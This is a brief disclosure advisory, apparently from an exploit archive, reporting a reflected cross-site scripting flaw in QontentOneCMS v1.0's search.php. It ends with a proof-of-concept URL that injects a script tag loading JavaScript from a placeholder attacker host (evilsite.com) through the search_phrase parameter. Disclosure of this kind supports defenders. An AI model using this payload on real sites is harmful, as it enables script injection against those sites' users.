QontentOneCMS v1.0 suffers from XSS in search.php
4ec9d025f341d894b509825c510e21640b54ddeea9caa43f0745403215b4b755
QontentOneCMS v1.0
homepage:
http://www.qontentone.com/
Effected files:
search.php
input forms
XSS Proof of concept:
http://www.example.com/search.php?search_phrase="><SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT><"&search=Search